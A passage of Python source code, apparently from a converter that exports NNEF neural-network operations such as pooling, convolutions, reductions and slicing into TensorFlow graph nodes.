padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
def export_div(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='RealDiv')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_elu(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Elu')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_eq(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Equal')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_exp(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Exp')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_external(self, nnef_node):
tfnode = NodeDef(name=nnef_node.name, op='Placeholder')
tfnode.attr['dtype'].type = 1
tfnode.attr['shape'].shape.dim.add().size = nnef_node.parameters['shape'][0]
for i in range(2, len(nnef_node.parameters['shape'])):
tfnode.attr['shape'].shape.dim.add().size = nnef_node.parameters['shape'][i]
tfnode.attr['shape'].shape.dim.add().size = nnef_node.parameters['shape'][1]
self.tf_graph.node.extend([tfnode])
def export_floor(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Floor')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_ge(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='GreaterEqual')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_gt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Greater')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_le(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LessEqual')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_linear(self, nnef_node):
input_shape = nnef_node.parameters['input'].output_shape
if len(input_shape) > 2:
i = 1
squeeze_dims = []
for j in range(2, len(input_shape)):
squeeze_dims.append(i)
i += 1
tfnode_squeeze = NodeDef(name=self.format_name(nnef_node.name) + '/squeeze', op='Squeeze')
self.add_input(tfnode_squeeze, nnef_node, 'input')
tfnode_squeeze.attr['T'].type = 1
tfnode_squeeze.attr['squeeze_dims'].list.i.extend(squeeze_dims)
self.tf_graph.node.extend([tfnode_squeeze])
tfnode = NodeDef(name=self.format_name(nnef_node.name) + '/linear', op='MatMul')
if len(input_shape) > 2:
tfnode.input.extend([tfnode_squeeze.name])
else:
self.add_input(tfnode, nnef_node, 'input')
self.add_input(tfnode, nnef_node, 'filter')
tfnode.attr['T'].type = 1
tfnode.attr['transpose_a'].b = False
tfnode.attr['transpose_b'].b = True
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
def export_local_response_normalization(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LRN')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['alpha'].f = nnef_node.parameters['alpha']
tfnode.attr['beta'].f = nnef_node.parameters['beta']
tfnode.attr['bias'].f = nnef_node.parameters['bias']
tfnode.attr['depth_radius'].i = nnef_node.parameters['size'][1]
self.tf_graph.node.extend([tfnode])
def export_log(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Log')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_lt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Less')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_l2_normalization(self, nnef_node):
assert(nnef_node.parameters['bias'] == 0.0), "TensorFlow cannot handle non-zero bias for op: l2_normalize"
tfnode_square = NodeDef(name=self.format_name(nnef_node.name) + '/Square', op='Square')
self.add_input(tfnode_square, nnef_node, 'input')
tfnode_square.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_square])
tfnode_const = NodeDef(name=self.format_name(nnef_node.name) + '/Const', op='Const')
tfnode_const.attr['dtype'].type = 3
tfnode_const.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['axes'])
tfnode_const.attr['value'].tensor.tensor_content = np.asarray(nnef_node.parameters['axes'], dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_const])
tfnode_sum = NodeDef(name=self.format_name(nnef_node.name) + '/Sum', op='Sum')
tfnode_sum.input.extend([tfnode_square.name])
tfnode_sum.input.extend([tfnode_const.name])
tfnode_sum.attr['T'].type = 1
tfnode_sum.attr['Tidx'].type = 3
tfnode_sum.attr['keep_dims'].b = True
self.tf_graph.node.extend([tfnode_sum])
tfnode_max_y = NodeDef(name=self.format_name(nnef_node.name) + '/Maximum/y', op='Const')
tfnode_max_y.attr['dtype'].type = 1
tfnode_max_y.attr['value'].tensor.dtype = 1
tfnode_max_y.attr['value'].tensor.float_val.extend([nnef_node.parameters['epsilon']])
self.tf_graph.node.extend([tfnode_max_y])
tfnode_max = NodeDef(name=self.format_name(nnef_node.name) + '/Maximum', op='Maximum')
tfnode_max.input.extend([tfnode_sum.name])
tfnode_max.input.extend([tfnode_max_y.name])
tfnode_max.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_max])
tfnode_rsqrt = NodeDef(name=self.format_name(nnef_node.name) + '/Rsqrt', op='Rsqrt')
tfnode_rsqrt.input.extend([tfnode_max.name])
tfnode_rsqrt.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_rsqrt])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Mul')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_rsqrt.name])
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_matmul(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='MatMul')
self.add_input(tfnode, nnef_node, 'A')
self.add_input(tfnode, nnef_node, 'B')
tfnode.attr['T'].type = 1
tfnode.attr['transpose_a'].b = nnef_node.parameters['transposeA']
tfnode.attr['transpose_b'].b = nnef_node.parameters['transposeB']
self.tf_graph.node.extend([tfnode])
def export_max(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Maximum')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_max_pool(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='MaxPool')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
sizes = nnef_node.parameters['size']
nhwc_sizes = [sizes[0]]
for i in range(2, len(sizes)):
nhwc_sizes.append(sizes[i])
nhwc_sizes.append(sizes[1])
tfnode.attr['ksize'].list.i.extend(nhwc_sizes)
dilations = nnef_node.parameters['dilation']
if dilations != [] and dilations != [1]*4:
raise ValueError("TensorFlow does not support dilated pooling")
strides = nnef_node.parameters['stride']
nhwc_strides = [strides[0]]
for i in range(2, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(strides[1])
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif(nnef_node.parameters['padding'] == [(0, 0), (0, 0), (0, 0), (0, 0)]):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[pads[0][0], pads[0][1]]]
for i in range(2, len(pads)):
padding = padding + [[pads[i][0], pads[i][1]]]
padding = padding + [[pads[1][0], pads[1][1]]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode])
def export_max_pool_with_index(self, nnef_node):
name = nnef_node.name[:nnef_node.name.find(',')]
tfnode = NodeDef(name=self.format_name(name), op='MaxPoolWithArgmax')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['Targmax'].type = 3
sizes = nnef_node.parameters['size']
nhwc_sizes = [sizes[0]]
for i in range(2, len(sizes)):
nhwc_sizes.append(sizes[i])
nhwc_sizes.append(sizes[1])
tfnode.attr['ksize'].list.i.extend(nhwc_sizes)
dilations = nnef_node.parameters['dilation']
if dilations != [] and dilations != [1]*4:
raise ValueError("TensorFlow does not support dilated pooling")
strides = nnef_node.parameters['stride']
nhwc_strides = [strides[0]]
for i in range(2, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(strides[1])
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif(nnef_node.parameters['padding'] == [(0, 0), (0, 0), (0, 0), (0, 0)]):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[pads[0][0], pads[0][1]]]
for i in range(2, len(pads)):
padding = padding + [[pads[i][0], pads[i][1]]]
padding = padding + [[pads[1][0], pads[1][1]]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode])
def export_max_reduce(self, nnef_node):
tfnode_axes = NodeDef(name=self.format_name(nnef_node.name) + '/axes', op='Const')
tfnode_axes.attr['dtype'].type = 3
array_length = len(nnef_node.parameters['axes'])
new_axes = []
for axis in nnef_node.parameters['axes']:
new_axes.append(self.mapping[axis])
tfnode_axes.attr['value'].tensor.dtype = 3
tfnode_axes.attr['value'].tensor.tensor_shape.dim.add().size = array_length
if array_length == 1:
tfnode_axes.attr['value'].tensor.int_val.extend([new_axes[0]])
else:
tfnode_axes.attr['value'].tensor.tensor_content = np.asarray(new_axes, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_axes])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Max')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_axes.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
tfnode.attr['keep_dims'].b = False
self.tf_graph.node.extend([tfnode])
def export_mean_reduce(self, nnef_node):
tfnode_axes = NodeDef(name=self.format_name(nnef_node.name) + '/axes', op='Const')
tfnode_axes.attr['dtype'].type = 3
array_length = len(nnef_node.parameters['axes'])
new_axes = []
for axis in nnef_node.parameters['axes']:
new_axes.append(self.mapping[axis])
tfnode_axes.attr['value'].tensor.dtype = 3
tfnode_axes.attr['value'].tensor.tensor_shape.dim.add().size = array_length
if array_length == 1:
tfnode_axes.attr['value'].tensor.int_val.extend([new_axes[0]])
else:
tfnode_axes.attr['value'].tensor.tensor_content = np.asarray(new_axes, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_axes])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Mean')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_axes.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
tfnode.attr['keep_dims'].b = False
self.tf_graph.node.extend([tfnode])
def export_min(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Minimum')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_mul(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Mul')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_multilinear_upsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeBilinear')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
def export_ne(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='NotEqual')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_nearest_downsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeNearestNeighbor')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
def export_nearest_upsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeNearestNeighbor')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
def export_neg(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Neg')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_not(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LogicalNot')
self.add_input(tfnode, nnef_node, 'x')
self.tf_graph.node.extend([tfnode])
def export_or(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LogicalOr')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
self.tf_graph.node.extend([tfnode])
def export_output_val(self, nnef_node):
return
def export_planewise_conv(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='DepthwiseConv2dNative')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
#Converts to Tensorflow format of [height, width, channels in, channel multiplier]
if nnef_node.parameters['input'].output_shape[1] != nnef_node.parameters['filter'].parameters['shape'][0]:
filter_node = nnef_node.parameters['filter']
np_array_read = filter_node.get_tensordatafile().get_data().get_array()[0]
np_array_read = np.reshape(np_array_read, filter_node.parameters['shape'])
new_shape = [nnef_node.parameters['input'].output_shape[1]]
new_shape.append(int(filter_node.output_shape[0]/new_shape[0]))
new_shape += filter_node.parameters['shape'][2:]
filter_node.parameters['shape'] = new_shape
np_array_read = np.reshape(np_array_read, new_shape)
filter_node.get_tensordatafile().get_data().set_array(np_array_read, override=True)
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 0, 1])
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*4
else:
nhwc_dilations = [1]*4
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*4
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(2):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
def export_pow(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Pow')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_relu(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Relu')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_reshape(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/shape', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['shape'])
if len(nnef_node.parameters['shape']) == 1:
tfnode_shape.attr['value'].tensor.int_val = nnef_node.parameters['shape'][0]
else:
shape_array = np.asarray(nnef_node.parameters['shape'])
tfnode_shape.attr['value'].tensor.tensor_content = np.asarray(shape_array, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Reshape')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([self.format_name(nnef_node.name) + '/shape'])
tfnode.attr['T'].type = 1
tfnode.attr['Tshape'].type = 3
self.tf_graph.node.extend([tfnode])
def export_round(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Round')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_rsqrt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Rsqrt')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_select(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Select')
self.add_input(tfnode, nnef_node, 'condition')
self.add_input(tfnode, nnef_node, 'true_value')
self.add_input(tfnode, nnef_node, 'false_value')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_separable_conv(self, nnef_node):
tfnode_depthwise = NodeDef(name=self.format_name(nnef_node.name) + '/depthwise', op='DepthwiseConv2dNative')
self.add_input(tfnode_depthwise, nnef_node, 'input', [0, 2, 3, 1])
#Converts to Tensorflow format of [height, width, channels in, channel multiplier]
if nnef_node.parameters['input'].output_shape[1] != nnef_node.parameters['plane_filter'].parameters['shape'][0]:
filter_node = nnef_node.parameters['plane_filter']
np_array_read = filter_node.get_tensordatafile().get_data().get_array()[0]
np_array_read = np.reshape(np_array_read, filter_node.parameters['shape'])
new_shape = [nnef_node.parameters['input'].output_shape[1]]
new_shape.append(int(filter_node.output_shape[0]/new_shape[0]))
new_shape += filter_node.parameters['shape'][2:]
filter_node.parameters['shape'] = new_shape
np_array_read = np.reshape(np_array_read, new_shape)
filter_node.get_tensordatafile().get_data().set_array(np_array_read, override=True)
self.add_input(tfnode_depthwise, nnef_node, 'plane_filter', [2, 3, 0, 1])
tfnode_depthwise.attr['T'].type = 1
tfnode_depthwise.attr['data_format'].s = 'NHWC'.encode('utf-8')
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*4
else:
nhwc_dilations = [1]*4
tfnode_depthwise.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*4
tfnode_depthwise.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode_depthwise.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(2):
tfnode_depthwise.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/depthwise/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/depthwise/Pad", op='Pad')
tfnode_pad.input.extend([tfnode_depthwise.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode_depthwise.input[0] = tfnode_pad.name
tfnode_depthwise.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode_depthwise])
conv_len = len(nnef_node.parameters['input'].output_shape)
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv2D')
tfnode.input.extend([tfnode_depthwise.name])
self.add_input(tfnode, nnef_node, 'point_filter', [2, 3, 1, 0])
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
tfnode.attr['use_cudnn_on_gpu'].b = True
tfnode.attr['T'].type = 1
nhwc_dilations = [1]*conv_len
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
nhwc_strides = [1]*conv_len
tfnode.attr['strides'].list.i.extend(nhwc_strides)
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
def export_shape_of(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Shape')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
tfnode.attr['out_type'].type = 3
self.tf_graph.node.extend([tfnode])
def export_sigmoid(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sigmoid')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sign(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sign')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
def export_slice(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Slice')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['Index'].type = 3
tfnode_begin = NodeDef(name=self.format_name(nnef_node.name) + '/begin', op='Const')
tfnode_begin.attr['dtype'].type = 3
tfnode_begin.attr['value'].tensor.dtype = 3
tfnode_begin.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['begin'])
begin_array = nnef_node.parameters['begin'][:]
for i in range(len(begin_array)):
if begin_array[i] == -1:
begin_array[i] = 0
if len(begin_array) == 1:
tfnode_begin.attr['value'].tensor.int_val = begin_array[0]
else:
size_array = np.asarray(begin_array)
tfnode_begin.attr['value'].tensor.tensor_content = np.asarray(size_array, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_begin])
tfnode_size = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_size.attr['dtype'].type = 3
tfnode_size.attr['value'].tensor.dtype = 3
tfnode_size.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['end'])
end_array = nnef_node.parameters['end'][:]
for i in range(len(end_array)):
if end_array[i] == 0:
end_array[i] = nnef_node.output_shape[i] - begin_array[i]
else:
end_array[i] = end_array[i] - begin_array[i]
